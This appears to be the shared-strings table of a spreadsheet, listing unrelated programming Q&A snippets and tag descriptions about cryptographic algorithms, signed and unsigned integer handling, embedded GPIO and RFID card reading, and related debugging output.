On-topic themes also include password management (storage, verification, entropy, breaking techniques such as rainbow tables...), advanced multi-party protocols (electronic voting schemes, digital cash, anonymous browsing...), usage of existing implementations (libraries, hardware accelerators, smartcards...), and so on.</t>
  </si>
  <si>
    <t>A numeric variable is signed if it can represent both positive and negative numbers, and unsigned if it can only represent non-negative numbers (zero or positive numbers).</t>
  </si>
  <si>
    <t>In cryptography, the Elliptic Curve Digital Signature Algorithm (ECDSA) offers a variant of the Digital Signature Algorithm (DSA) which uses elliptic curve cryptography.</t>
  </si>
  <si>
    <t>this will protect your command from snooping, it will make a MITM attacker unable to deduce what command you sent even IF the attacker knows how the protocol works, as the token now serves as a salt for the encrypted command.. but you're still vulnerable to bit-flipping from a MITM attacker even if the attacker does not know the key, thus you should also add a checksum to make sure the ciphertext has not been tampered with... how about for the client:
after this i would normally add another size header so the server knows how many bytes to read for the entire packet, but since you say you're using the HTTP protocol, i assume you'll use a  header as the outer size header..  (or if you don't, you should probably do another $data=big_endian_uint16_t(strlen($data)).$data; after xtea-encrypting it)
and for the server do like
function decrypt(string $data){
     // 4=checksum 8=token 2=inner_command_length
     if(strlen($data) &lt; (4+8+2) || strlen($data) % 8 !== 0){
         // can't be an xtea-encrypted command, wrong length.</t>
  </si>
  <si>
    <t>*/
#define _MAP_SIZE                           0x1000  // 4096 
#define _WPMR_OFFSET                        0x0E4   // PIO Write Protection Mode Register Bank D
#define _PIO_ENABLE                         0x000
#define _PIO_DISABLE                        0x004
#define _PIO_STATUS                         0x008
#define _OUTPUT_ENABLE                      0x010
#define _OUTPUT_DISABLE                     0x014
#define _OUTPUT_STATUS                      0x018
#define _FILTER_ENABLE                      0x020
#define _FILTER_DISABLE                     0x024
#define _FILTER_STATUS                      0x028
#define _OUTPUT_DATA_SET                    0x030
#define _OUTPUT_DATA_CLEAR                  0x034
#define _OUTPUT_DATA_STATUS                 0x038
#define _PIN_DATA_STATUS                    0x03c
#define _MULTI_DRIVER_ENABLE                0x050
#define _MULTI_DRIVER_DISABLE               0x054
#define _MULTI_DRIVER_STATUS                0x058
#define _PULL_UP_DISABLE                    0x060
#define _PULL_UP_ENABLE                     0x064
#define _PULL_UP_STATUS                     0x068
#define _PULL_DOWN_DISABLE                  0x090
#define _PULL_DOWN_ENABLE                   0x094
#define _PULL_DOWN_STATUS                   0x098
#define _DISABLE_WRITE_PROTECTION           0x50494F00  // Desable write protection
#define LED_PIN                                 21
int main(void) {
    volatile void *gpio_addr;
    volatile unsigned int *gpio_enable_addr;
    volatile unsigned int *gpio_output_mode_addr;
    volatile unsigned int *gpio_output_set_addr;
    volatile unsigned int *gpio_output_clear_addr;
    volatile unsigned int *gpio_data_status_addr;
    volatile unsigned int *gpio_write_protection_addr;
    int fd = open("/dev/mem", O_RDWR|O_SYNC);
    if (fd &lt; 0){
        fprintf(stderr, "Unable to open port\n\r");
        exit(fd);
    }
    gpio_addr = mmap(NULL, _MAP_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, _PIO_OFFSET);
    if(gpio_addr == MAP_FAILED){
        handle_error("mmap");
    }
    gpio_write_protection_addr = gpio_addr + _PIOD_BANK_D + _WPMR_OFFSET;
    gpio_enable_addr = gpio_addr + _PIOD_BANK_D + _PIO_ENABLE;
    gpio_output_mode_addr = gpio_addr + _PIOD_BANK_D + _OUTPUT_ENABLE;
    gpio_output_set_addr = gpio_addr + _PIOD_BANK_D + _OUTPUT_DATA_SET;
    gpio_output_clear_addr = gpio_addr + _PIOD_BANK_D + _OUTPUT_DATA_CLEAR;
    gpio_data_status_addr = gpio_addr + _PIOD_BANK_D + _OUTPUT_DATA_STATUS;
    *gpio_write_protection_addr = _DISABLE_WRITE_PROTECTION;
    *gpio_enable_addr = 1 &lt;&lt; LED_PIN;
    *gpio_output_mode_addr = 1 &lt;&lt; LED_PIN; // Output
    // If LED
    if((*gpio_data_status_addr &amp; (1&lt;&lt;LED_PIN)) &gt; 0){
        *gpio_output_clear_addr = 1 &lt;&lt; LED_PIN;
    }else{
        *gpio_output_set_addr = 1 &lt;&lt; LED_PIN;
    }
    return 0;
}
EDIT :
Answer for the 3) in the comments.</t>
  </si>
  <si>
    <t>The cryptographic strength of the HMAC depends upon the cryptographic strength of the underlying hash function, the size of its hash output length in bits and on the size and quality of the cryptographic key.</t>
  </si>
  <si>
    <t>Assuming this sector has its key A set to the default value (FF FF FF FF FF FF) and configured for read access to block 5, you could use:
byte TRANSPORT_KEY[] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
// authenticate current sector using key type A and the key TRANSPORT_KEY
rfid.authenticate(1, 0xAA, TRANSPORT_KEY);
Finally, you can read the data from block 5:
rfid.readBlock(5);
Serial.print("Block 5: ");
printArrayHex(rfid.getBlock(), 16);
Serial.println();
Alternatively, if you want to read the whole memory of a MIFARE Classic 1K card (and assuming that all blocks are readable using key A with the TRANSPORT_KEY value), you could use something like this:
for (byte sector = 0; sector &lt; 16; ++sector) {
    // authenticate current sector using key type A and the key TRANSPORT_KEY
    rfid.authenticate(sector, 0xAA, TRANSPORT_KEY);
    for (byte block = 0; block &lt; 4; ++block) {
        rfid.readBlock(sector * 4 + block);
        Serial.print("Sector ");
        Serial.print(sector);
        Serial.print(", Block ");
        Serial.print(block);
        Serial.print(": ");
        printArrayHex(rfid.getBlock(), 16);
        Serial.println();
    }
}</t>
  </si>
  <si>
    <t>By comparison, at a security level of 80 bits (meaning an attacker requires the equivalent of about  operations to find the private key) the size of a DSA public key is at least 1024 bits, whereas the size of an ECDSA public key would be 160 bits.</t>
  </si>
  <si>
    <t>The only places where signs make a difference are
constants: just cast them to bytes
toString and parseInt
division
&lt;, &gt;, &gt;=, &lt;=
Operations where signedness does not matter:
addition
subtraction
multiplication
bit arithmetic (except for , just use &gt;&gt;&gt; instead)
To convert bytes to their unsigned values as ints, just use &amp; 0xFF, and to convert those to bytes use (byte).</t>
  </si>
  <si>
    <t>LibTomCrypt is, according to its website,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</si>
  <si>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On the other hand, the signature size is the same for both DSA and ECDSA:  bits, where  is the security level measured in bits, that is, about 320 bits for a security level of 80 bits.</t>
  </si>
  <si>
    <t>Assuming your  is a counter value for the current time, and time4 is some earlier value, and they're both of unsigned type (or the one of signed type promotes up the unsigned type of the other),
This is because C++ guarantees that unsigned arithmetic is performed modulo 2n, where n is the number of bits in the value representation of the unsigned type.</t>
  </si>
  <si>
    <t>As with elliptic curve cryptography in general, the bit size of the public key believed to be needed for ECDSA is about twice the size of the security level, in bits.</t>
  </si>
  <si>
    <t>Read more here
Types of Encryption
Deterministic Encryption
Randomized Encryption
Deterministic Encryption
Deterministic encryption always generates the same encrypted value for any given plaintext value.</t>
  </si>
  <si>
    <t>Exclusive-disjunction or exclusive-or (XOR; operator ) is a logical operation like AND and OR, having the following truth table:
XOR operations are useful for parity (eg providing the +1 redundancy in a RAID-5 disk configuration), swapping registers in CPUs without SWAP instructions, graphic overlays, cryptographic functions etc.</t>
  </si>
  <si>
    <t>So for example:
An unsigned long using 4 bytes has a value range from 0 to 4,294,967,295
A (signed) long using 4 bytes  has a value range from -2,147,483,648 to 2,147,483,647
The use of UL at the end of a number explicitly tells the compiler that this value is an unsigned long.</t>
  </si>
  <si>
    <t>The  keyword can be followed by any C and C++ built-in data type, including int, short, signed, unsigned, char, signed char, unsigned char, double, long, or long double.</t>
  </si>
  <si>
    <t>Prime numbers are commonly used within public-key cryptography algorithms, hash tables and pseudorandom number generators.</t>
  </si>
  <si>
    <t>Common database support:
 - Oracle: SEQUENCE (stand-alone number generator) and IDENTITY column clause that uses a system-generated SEQUENCE
 - mySQL: AUTO_INCREMENT column clause
 - Microsoft SQL Server, IBM DB2: SEQUENCE (stand-alone number generator)
See also sequence for questions not related specifically to a primary key.</t>
  </si>
  <si>
    <t>A public key consists of two numbers: the modulus n, which is a large integer and determines the key size (1024 bits, 2048 bits and 4096 bits are common key sizes), and the public exponent e, which can be any odd integer between 3 and n but is often 3 or 65537.</t>
  </si>
  <si>
    <t>be sure to generate a
;; 24bit signed number consecutive application of pos-um-&gt;request and
;; response-&gt;pos-um should be the identity (if you don't consider the
;; prefix "PF" that response-&gt;pos-um expects)
(defun pos-um-&gt;request (pos-um)
  (declare (single-float pos-um)
       (values string &amp;optional))
  (format nil "~6,'0X"
      (let ((val (round pos-um +step-size+)))
        (if (&lt; val 0)
        (+ #xffffff val 1)
        val))))
(defun get-position ()
  (declare (values single-float &amp;optional))
  (response-&gt;pos-um (talk-zeiss *fd* *stream* "FPZp")))
(defun set-position (position-um)
  "Decreasing the position moves away from sample."</t>
  </si>
  <si>
    <t>Elliptic curve cryptography (ECC) is a public-key cryptographic scheme based upon the mathematical properties of elliptic curves over finite fields.</t>
  </si>
  <si>
    <t>The library implements cryptographic hash functions, public-key cryptography, message authentication codes (MACs), key agreement schemes, elliptic curve cryptography and other cryptographic schemes.</t>
  </si>
  <si>
    <t>Non-blocking algorithms refer to use of concurrency without the usual mutual exclusion primitives, guaranteeing that thread operations will not block indefinitely.</t>
  </si>
  <si>
    <t>The module includes both high level recipes and low level interfaces to common cryptographic algorithms such as symmetric ciphers, message digests, and key derivation functions.</t>
  </si>
  <si>
    <t>.... = Acknowledge Request: True
.... .... .1.. .... = Intra-PAN: True
.... 10.. .... .... = Destination Addressing Mode: Short/16-bit (0x0002)
..00 .... .... .... = Frame Version: 0
10.. .... .... .... = Source Addressing Mode: Short/16-bit (0x0002)
Sequence Number: 126
Destination PAN: 0x1234
Destination: 0x0002
Source: 0x0001
I still don't know where the second 16-bit counter comes from in front of the actual data byte, and why FCS is messed up (I had to strip the beginning len field to get Wireshark to read it - that's probably it.)</t>
  </si>
  <si>
    <t>Twofish is a symmetric key block cipher with a block size of 128 bits and key sizes up to 256 bits, designed by a team including Bruce Schneier, John Kelsey, Doug Whiting, David Wagner, Chris Hall, and Niels Ferguson, for the 1997 Advanced Encryption Standard contest.</t>
  </si>
  <si>
    <t>An unsigned variable is a variable that can only represent non-negative numbers, as opposed to a signed variable which can represent both positive and negative numbers.</t>
  </si>
  <si>
    <t>From Wikipedia:
In software engineering, double-checked locking (also known as "double-checked locking optimization"1) is a software design pattern used to reduce the overhead of acquiring a lock by first testing the locking criterion (the "lock hint") without actually acquiring the lock.</t>
  </si>
  <si>
    <t>In cryptography, Triple DES, or 3DES, is the common name for the Triple Data Encryption Algorithm (TDEA or Triple DEA) block cipher, which applies the Data Encryption Standard (DES) cipher algorithm three times to each data block.</t>
  </si>
  <si>
    <t>My actual output however, is a 24 bit signed number as you can see below:
Also here is the code that I used to read the results if you're interested:
In order for this number to be useful, I need to convert it back to a 24 bit signed integer (I'm not sure how to do that or eve if it's possible because 24 is not a power of 2) so I'm a bit stuck.</t>
  </si>
  <si>
    <t>That data was originally 16 bit signed integers (+/- 32k) and dacBuffer16 is an array of 16bit unsigned integers (0-64K).</t>
  </si>
  <si>
    <t>If you need a guaranteed unique sequence of random numbers, you cannot rely on simply generating random numbers, as the probability of a collision is quite high for relatively small sample sets.</t>
  </si>
  <si>
    <t>assuming your number is unsigned, you could try the following:
If your integer is signed, you would need an extra element in the array and some minor modifications to the code to account for the sign.</t>
  </si>
  <si>
    <t>Negative zero is a value that occurs in several representations of signed numbers, including IEEE 754 floating point formats and integers using ones' complement or sign-and-magnitude representation.</t>
  </si>
  <si>
    <t>I was having problems earlier with signed integers not displaying correctly, as it turns out, the Arduino Due stores standard integers as 32 bit numbers which resulted in the 16 bit signed data coming out all positive and over 65000 for negatives.</t>
  </si>
  <si>
    <t>if the first columns are msbits of operand a b and carry in to the msbit (other bits dont matter for signed nor unsigned overflow), the right colums are carry out and result.</t>
  </si>
  <si>
    <t>If the smaller type is signed, then the promoted type is sign extended - the signed char value  is promoted to a signed int with the same value -x, which in 2's complement machines means prefixing it with some 0xff bytes.</t>
  </si>
  <si>
    <t>It defines a set of methods specifically for setting and accessing the value as a signed or unsigned char, short int, int, long int, long long int, float, or double or as a BOOL.</t>
  </si>
  <si>
    <t>Given a register size of 32 bits and storing integer values as two's complement, any value with highest bit set is representing a negative value if treated as signed.</t>
  </si>
  <si>
    <t>When you cast a 16-bit signed integer literal, 1&lt;&lt;15, to a 32-bit unsigned integer literal, it will take the following steps:
You're casting from 16-bit up to 32-bit, so it will first extend your existing literal to 32-bits.</t>
  </si>
  <si>
    <t>A typical maximum value for a 16bit signed integer is  (the first bit would be used as the sign bit), in decimal 32767.</t>
  </si>
  <si>
    <t>3des is the common name for the Triple Data Encryption Algorithm (TDEA or Triple DEA) block cipher in cryptography, which applies the Data Encryption Standard (DES) cipher algorithm three times to each data block.</t>
  </si>
  <si>
    <t>This cipher and mode requires the input to decrypt being multiple of block size (128 bit)
The cipher complains about the input being not multiple of 16
As I noticed it usually happens when I try to decrypt many (about 100) Strings in short time
What came to my mind (as James commented, it is my educated guess), the cipher object is not thread safe.</t>
  </si>
  <si>
    <t>Presented along with XTEA was a variable-width block cipher termed Block TEA, which uses the XTEA round function, but Block TEA applies it cyclically across an entire message for several iterations.</t>
  </si>
  <si>
    <t>DSA (Digital Signature Algorithm) is a public-key signature algorithm defined by NIST.</t>
  </si>
  <si>
    <t>Like a handwritten signature, a digital signature has many useful characteristics:
Its authenticity can be verified, via a computation that uses the public key corresponding to the private key used to generate the signature.</t>
  </si>
  <si>
    <t>Differences from PyCrypto
From the PyCryptodome repository:
It brings the following enhancements with respect to the last official
  version of PyCrypto (2.6.1):
Authenticated encryption modes (GCM, CCM, EAX, SIV, OCB)
Accelerated AES on Intel platforms via AES-NI
First class support for PyPy
Elliptic curves cryptography (NIST P-256 curve only)
Better and more compact API (nonce and iv attributes for ciphers,   automatic generation of random nonces and IVs, simplified
  CTR cipher mode,   and more)
SHA-3 (including SHAKE XOFs), SHA-512/t and BLAKE2 hash algorithms
Salsa20 and ChaCha20 stream ciphers
scrypt and HKDF
Deterministic (EC)DSA
Password-protected PKCS#8 key containers
Shamir's Secret Sharing scheme
Random numbers get sourced directly from the OS (and not from a CSPRNG in userspace)
Simplified install process, including better support for Windows
Cleaner RSA and DSA key generation (largely based on FIPS 186-4)
Major clean ups and simplification of the code base
PyCryptodome is not a wrapper to a separate C library like OpenSSL.</t>
  </si>
  <si>
    <t>To start, change
To
millis() returns an unsigned long so if you are trying to insert that number + 5000 into a signed int, you are overflowing the int and causing weird calculations in your loop.</t>
  </si>
  <si>
    <t>From "Signed Types" on Encoding - Protocol Buffers - Google Code:
ZigZag encoding maps signed integers to unsigned integers so that numbers with a small absolute value (for instance, -1) have a small varint encoded value too.</t>
  </si>
  <si>
    <t>ZigZag encoding maps signed integers to unsigned integers so that numbers with a small absolute value (for instance, -1) have a small varint encoded value too.</t>
  </si>
  <si>
    <t>The functionality includes symmetric encryption, public key cryptography and key agreement, certificate handling, cryptographic hash functions and a cryptographic pseudo-random number generator.</t>
  </si>
  <si>
    <t>One half of an n-bit key is used as the actual encryption key and the other half of the n-bit key is used to modify the encryption algorithm (key-dependent S-boxes).</t>
  </si>
  <si>
    <t>Using cryptographic functions, like (one way) hash functions or cipher algorithms, usually easily produces the desired result as well; this comes at a cost though: The "mixing" of those functions is by design extremely strong, which makes it impossible to determine the quality (= randomness) of the source data after the transformation.</t>
  </si>
  <si>
    <t>It allows in some cases a smaller public key (for instance, 160 bit in ecdsa compared to 1024 bit in dsa for 80 but security level), and requires the two sides to agree on a curve's field and equation, as well as a prime order on the curve and a multiplicative of the order.</t>
  </si>
  <si>
    <t>DSA (short for Digital Signature Algorithm) is a specific public-key cryptography algorithm to sign messages.</t>
  </si>
  <si>
    <t>If you want to combine signed bytes, you need to mask off the sign extension:
uid = (nuidPICC[0] &lt;&lt; 24);
uid = uid | (nuidPICC[1] &lt;&lt; 16) &amp; 0xff0000;
uid = uid | (nuidPICC[2] &lt;&lt; 8) &amp; 0xff00;
uid = uid | nuidPICC[3] &amp; 0xff;
or
uid = ( 0xffffffd1 &lt;&lt; 24) 
      | ( ( 0x00000055 &lt;&lt; 16 )  &amp; 0xff0000 )
      | ( ( 0xffffffbf &lt;&lt; 8 ) &amp; 0xff00 ) 
      | ( 0x0000002d &amp; 0xff ) 
    = 0xd155bf2d
but usually it's easier to use unsigned bytes for bit masks as they don't have sign extension:
    uint8_t nuidPICC[] = { 0xD1,0x55,0xBF,0x2D };
    uint32_t uid = (nuidPICC[0] &lt;&lt; 24);
    uid = uid | (nuidPICC[1] &lt;&lt; 16);
    uid = uid | (nuidPICC[2] &lt;&lt; 8);
    uid = uid | nuidPICC[3];
    printf("uid = ( 0x%x &lt;&lt; %d) | ( 0x%x &lt;&lt; %d ) | ( 0x%x &lt;&lt; %d ) | 0x%x  = 0x%x\n",
        nuidPICC[0], 24,
        nuidPICC[1], 16,
        nuidPICC[2], 8,
        nuidPICC[3], uid);
uid = ( 0x000000d1 &lt;&lt; 24)
    | ( 0x00000055 &lt;&lt; 16 )
    | ( 0x000000bf &lt;&lt; 8 ) 
    |   0x0000002d  
    = 0xd155bf2d</t>
  </si>
  <si>
    <t>I would personally feed the entropy to a separate pseudorandom number generator, and mix its output to the primary generator state.</t>
  </si>
  <si>
    <t>Definition
Consistent hashing is a special kind of hashing such that when a hash table is resized and consistent hashing is used, only  keys need to be remapped on average, where K is the number of keys, and n is the number of slots.</t>
  </si>
  <si>
    <t>File -&gt; Import -&gt; Raw Data  ... values you use for Encoding depend on how you treat the audio curve ... typically silence is value 0 then as the curve wobbles it does from positive to negative values ...  if your data varies from 0 to 1024 which is unsigned you may want to normalize it so it varies instead from -1 to +1 so its considered signed ... various such formats will work
You have two challenges : (1) validate your audio capture and (2) properly cut a binary file with the raw audio ...</t>
  </si>
  <si>
    <t>For systems that use a signed 32-bit integer, which has a maximum possible value of 2,147,485,547, the maximum possible date is then 03:14:07 January 19, 2038, at which time adding one second will cause an integer overflow and result in a negative number, which will correspond to a time in the year 1901.</t>
  </si>
  <si>
    <t>When we send an message from zigbee which is connected to PC to another Zigbee which is connected to raspberry pi board.We are getting an message,similarly which i had sent from Zigbee Connected PC
for example:* Hello World *,but in receiver section i am getting Hello World with Encrypted data (with Header bit and Check-sum bit)
But i need Only Hello World in Receiver Terminal
In Receiver Terminal Zigbee is connected to raspberry pi for that interfacing ,i am using Serial to USB cable.</t>
  </si>
  <si>
    <t>The blocking I/O model may be more appropriate for data intensive, low latency scenarios, whereas the non-blocking model may be more appropriate for high latency scenarios where raw data throughput is less important than the ability to handle thousands of simultaneous HTTP connections in a resource efficient manner.</t>
  </si>
  <si>
    <t>Key Features
Three Modes for Protection - you can easily define which strategies to be used for spam protection
Set Custom Error Message - the error message that is displayed when the condition being validated fails
Background and Line Noise Level of the Captcha Image - you can easily control the background and the line noise of the Image by setting the respective value (None, Low, Medium, High or Extreme)
Font Family and Font Warp of the Captcha Image - you can easily choose which font family to be used for the Image text
Text Length and Possible Characters of the Captcha Image - the default length of the text is 5 characters, and the characters could be either letters or either numeric characters
Maximum Time Interval of the Captcha Image - the maximum number of minutes the Captcha Image will be cached and valid
Minimum Timeout - minimum number of seconds the form must be displayed before it is valid.</t>
  </si>
  <si>
    <t>A signed integer () can take values from -32768 to 32767 (as it is two bytes, each 8 bit making a 16 byte number so ranging from -2^15 to 2^15-1).</t>
  </si>
  <si>
    <t>The data register bytes do need to be combined the way I did and have a right shift, but it needs to be a signed right shift whereas my code was amounting to an unsigned right shift.</t>
  </si>
  <si>
    <t>Using an Arduino, I have to write a function in Atmel AVR Assembly for my computer science class that converts a signed 8-bit byte to a signed 16-bit integer.</t>
  </si>
  <si>
    <t>However, if a sufficiently random salt is used for every hashed value, creating a rainbow table would become impractical, requiring the attacker to computer a rainbow table as many times larger as the number of possible values of the salt.</t>
  </si>
  <si>
    <t>Length: Length of the data payload(When encryption is used, the
message integrity code (MIC) at the end of the packet is 4 bytes, so 
this leads to 251 bytes as actual maximum available payload size.</t>
  </si>
  <si>
    <t>Netmask can be specified either in quad-dotted decimal representation like 255.255.254.0 (means the seven lower bits identify computers in subnetwork) or, together with IP address, as a number of the high bits used by the larger network and not by subnetwork (192.168.80.0/23, the same).</t>
  </si>
  <si>
    <t>This effectively transforms a block cipher into a stream cipher where exactly the same algorithm is used for encryption and decryption.</t>
  </si>
  <si>
    <t>This C code uses shifts and exclusive-ors to apply the mask and parity calculation:
    p = x;
    while ((x &gt;&gt;= 7) != 0)
        p ^= x;
    p = (p ^ (p &gt;&gt; 1) ^ (p &gt;&gt; 2) ^ (p &gt;&gt; 4)) &amp; 7;
where x and p are 32-bit unsigned types.</t>
  </si>
  <si>
    <t>xxHash is an extremely fast non-cryptographic Hash algorithm, working at speeds close to RAM limits.</t>
  </si>
  <si>
    <t>There are various kind of spoofing such as IP spoofing, MAC spoofing, E-mail address spoofing, Caller ID spoofing, GPS Spoofing etc.</t>
  </si>
  <si>
    <t>81)
// First byte has FIN bit and frame type opcode = text
// Second byte mask and payload length
// next four bytes for masking key
// So total of 6 bytes for the overhead
// The size of the payload in this case is "F" = 15  (the 4th nibble) 
// So total of bytes are (6+15) = 21
// The first  byte is saying&gt; FIN bit is set.</t>
  </si>
  <si>
    <t>RC2 is a symmetric-key block cipher with 64-bit wide block and variable key sizes.</t>
  </si>
  <si>
    <t>Disadvantages
Number has a limited range (signed 32-bit integer in our case, which ranges from -2147483648 to 2147483647).</t>
  </si>
  <si>
    <t>CTR is a mode of operation for block ciphers where a nonce and (block-)counter are encrypted together by the block cipher and the result is XORed with the plaintext.</t>
  </si>
  <si>
    <t>Integer arithmetic
Why is unsigned integer overflow defined behavior but signed integer overflow isn't?</t>
  </si>
  <si>
    <t>(at least if you're using 19 rounds or more, as currently the only known XTEA cryptographic attacks affects 18 rounds or less, as of 2009. but given that the default-and-recommended is 32 rounds, that shouldn't be an issue unless you use a custom and low number of rounds.. like 18)
Is the described method a reasonable solution for my problem?</t>
  </si>
  <si>
    <t>Regarding your second question: the first 2 variables are 8bit (one signed and one unsigned), so the ostream assumes they are chars (also 8bit wide) and displays the char representation for them ("1" = ASCII 49).</t>
  </si>
  <si>
    <t>Application
A common application is public-key cryptography (such as that in every modern Web browser), whose algorithms commonly employ arithmetic with integers having hundreds of digits.</t>
  </si>
  <si>
    <t>Public Key Encryption: RSA (encrypt/decrypt, sign/verify)
Secret Key Encryption: AES, DES, 3DES, BlowFish, XTEA, RC4
Confidentiality Modes: ECB, CBC, CFB, CFB8, OFB, CTR
Hashing Algorithms: MD2, MD5, SHA-1, SHA-224, SHA-256
Paddings available: PKCS#5, PKCS#1 type 1 and 2
Other Useful Stuff: HMAC, Random, TLS-PRF, some ASN-1/DER parsing
https://code.google.com/p/as3crypto/</t>
  </si>
  <si>
    <t>The STM32F4 has a single precision FPU, so the operation will be done in hardware - however if you are using floating point in interrupt or thread contexts be-aware that the floating point registers are unlikely to be preserved between contexts unless you have explicitly implemented it, so for example a floating point operation will be corrupted if interrupted by an interrupt that performs floating point operations.</t>
  </si>
  <si>
    <t>For this to work, you must ensure that the arguments are actually (0-terminated) C-strings:
In case that the default character type in your environment is signed char, to pass data directly to string functions, a cast is needed from unsigned to signed:
if (strcmp(reinterpret_cast&lt;const char*&gt;(data),"t")==0) {
   ...
}
So a complete MVCE could look as follows:
int get(uint8_t *data, int size) {
    data[0] = 't';
    return 1;
}
int main()
{
    uint8_t data[9];
    uint8_t size = get(data, 8);
    data[size]='\0';
    if (strcmp(reinterpret_cast&lt;const char*&gt;(data),"t")==0) {
        cout &lt;&lt; "found 't'" &lt;&lt; endl;
    }
}
Output:
found 't'</t>
  </si>
  <si>
    <t>for example i want a generate a unique code with (CPU serial number + ram serial number + ethernet mac address or etc) 
so how can i get CPU  or Ram serial number in UWP ?</t>
  </si>
  <si>
    <t>A stream cipher is an encryption algorithm which encrypts arbitrary length plain text, using a (fixed length) key to produce a ciphertext that is as long as the plaintext.</t>
  </si>
  <si>
    <t>The available service types are:
Guaranteed service 
Guaranteed service provides high quality, quantifiable guarantees with bounded (guaranteed minimum) latency.</t>
  </si>
  <si>
    <t>GOST 34.10 is a family of the Russian Federal standards for digital signature algorithm which use elliptic curve cryptography.</t>
  </si>
  <si>
    <t>For example, a Two's complement signed 16-bit integer can hold the values 32768 to 32767 inclusively, while an unsigned 16 bit integer can hold the values 0 to 65535.</t>
  </si>
  <si>
    <t>PKCS#11 is a standard that defines a platform-independent API called Cryptoki (short for Cryptographic Token Interface) for accessing and operating cryptographic tokens such as Smartcards and Hardware Security Modules (HSMs)
The Cryptoki API defines most commonly used cryptographic object types (the API is extensible to support new cryptographic algorithms) and all the functions needed to manage the lifecycle of those objects (creation, generation, usage, modification, and deletion).</t>
  </si>
  <si>
    <t>Then each subsequent block of plaintext is XORed with the previous ciphertext block before being encrypted thus making all the blocks dependent on all the previous blocks.</t>
  </si>
  <si>
    <t>Although the encryption/decryption operation of the usual OTP cipher (just XOR with the key stream) is extremely simple to implement, OTP should not be considered a classical cipher.</t>
  </si>
  <si>
    <t>Electronic Codebook mode (ECB) is a mode of operation for block ciphers that involves dividing the message into blocks and encrypting each block independently.</t>
  </si>
  <si>
    <t>The values returned by a hash function are called hash values, hash codes, hash sums, checksums or simply hashes.</t>
  </si>
  <si>
    <t>This the Arduino code:
This is the Java code:
In Java when I try to decrypt the encoded String by Arduino I get this:
Processing 3.0 AES-128 ECB Encryption/Decryption Example
++++++++++++++++++++++++++++++++
Original Message: 0123456789012345
Key: 2222222222222222
key in bytes: [B@2a139a55
==========================
Encrypted String (base 64): Ouril+UTDF8htLzEhiRj7w==
length: 16
Exception in thread "main" javax.crypto.IllegalBlockSizeException: Input length not multiple of 16 bytes
    at com.sun.crypto.provider.CipherCore.finalNoPadding(CipherCore.java:1016)
    at com.sun.crypto.provider.CipherCore.doFinal(CipherCore.java:960)
    at com.sun.crypto.provider.CipherCore.doFinal(CipherCore.java:824)
    at com.sun.crypto.provider.AESCipher.engineDoFinal(AESCipher.java:436)
    at javax.crypto.Cipher.doFinal(Cipher.java:2165)
    at main.ForTest.main(ForTest.java:46)
Any ideas?</t>
  </si>
  <si>
    <t>It offers lower-level classes such as , QTcpServer and QUdpSocket that represent low-level network concepts, and high-level classes such as QNetworkRequest, QNetworkReply and QNetworkAccessManager to perform network operations using common protocols.</t>
  </si>
  <si>
    <t>Here are some things to consider - 
Client-side encryption, where an encryption key is used on the client to encrypt certain data attributes before sending it to the cloud
On the wire encryption using TLS and CA-signed certificates
Server-side encryption and encryption at rest</t>
  </si>
  <si>
    <t>representable positive value for (signed) 2s complement integers with 16 bits is 32767, for unsigned it is 65535.</t>
  </si>
  <si>
    <t>A  is an eight-bit unsigned value, while a char can be signed or unsigned, but is still an eight bit byte.</t>
  </si>
  <si>
    <t>However, the IDIV instruction (signed divide) divides a signed number, rounding towards zero.</t>
  </si>
  <si>
    <t>Disambiguation
For digital signatures such as RSA or DSA signatures please use digital-signature and/or cryptography.</t>
  </si>
  <si>
    <t>14 ==3082== Use of uninitialised value of size 8
15 ==3082== at 0x4E730EB: _itoa_word (_itoa.c:195)
16 ==3082== by 0x4E743D8: vfprintf (vfprintf.c:1613)
17 ==3082== by 0x4E7E6F9: printf (printf.c:35)
18 ==3082== by 0x40052B: main (ex4.c:11)
19 ==3082==
20 ==3082== Conditional jump or move depends on uninitialised value(s)
21 ==3082== at 0x4E730F5: _itoa_word (_itoa.c:195)
22 ==3082== by 0x4E743D8: vfprintf (vfprintf.c:1613)
23 ==3082== by 0x4E7E6F9: printf (printf.c:35)
24 ==3082== by 0x40052B: main (ex4.c:11)
25 ==3082==
26 ==3082== Conditional jump or move depends on uninitialised value(s)
27 ==3082== at 0x4E7633B: vfprintf (vfprintf.c:1613)
28 ==3082== by 0x4E7E6F9: printf (printf.c:35)
29 ==3082== by 0x40052B: main (ex4.c:11)
30 ==3082==
31 ==3082== Conditional jump or move depends on uninitialised value(s)
32 ==3082== at 0x4E744C6: vfprintf (vfprintf.c:1613)
33 ==3082== by 0x4E7E6F9: printf (printf.c:35)
34 ==3082== by 0x40052B: main (ex4.c:11)
35 ==3082==
36 I am 0 inches tall.</t>
  </si>
  <si>
    <t>version     : 3
        serial number     : 3C:75:FE:30:01:DD:A3:B9:EF:72:DC:F6:7A:5C:A2:54
        issuer name       : C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 ECC 256 bit SSL CA - G2
        subject name      : C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=*.iot.us-east-2.amazonaws.com
        issued  on        : 2017-10-12 00:00:00
        expires on        : 2018-10-13 23:59:59
        signed using      : ECDSA with SHA256
        EC key size       : 256 bits
        basic constraints : CA=false
        subject alt name  : iot.us-east-2.amazonaws.com, *.iot.us-east-2.amazonaws.com
        key usage         : Digital Signature
        ext key usage     : TLS Web Server Authentication, TLS Web Client Authentication  
Subscribing...
  ERROR: main L#206 Error subscribing : -28 
Can anyone show me what is happening?</t>
  </si>
  <si>
    <t>jarsigner - JAR Signing and Verification Tool  
Generates signatures for Java ARchive (JAR) files, and verifies the signatures of signed JAR files.</t>
  </si>
  <si>
    <t>With high confidence I'd say either
the input is passed as not complete (you may want to log the input byte array length)
there are multiple threads reusing the same cipher object</t>
  </si>
  <si>
    <t>Also, signed overflow is undefined behavior in C++, so you are technically on shaky grounds (I originally thought that Arduino always compiles with -fwrapv which guarantees wraparound on signed integer overflow, but apparently I was mistaken).</t>
  </si>
  <si>
    <t>It needs to minor fixes:
The first fix is to declare  differently:
uint8_t is an unsigned byte, char is usually a signed byte (it's unfortunately implementation defined).</t>
  </si>
  <si>
    <t>Some HSMs also contain special-purpose chips that offer acceleration for particular cryptographic operations, such as RSA signature generation or elliptic curve operations.</t>
  </si>
  <si>
    <t>Lockless operations guarantee simultaneous access to data structures without the usage of conventional locks which are generally slow operations like critical sections, mutexes etc.</t>
  </si>
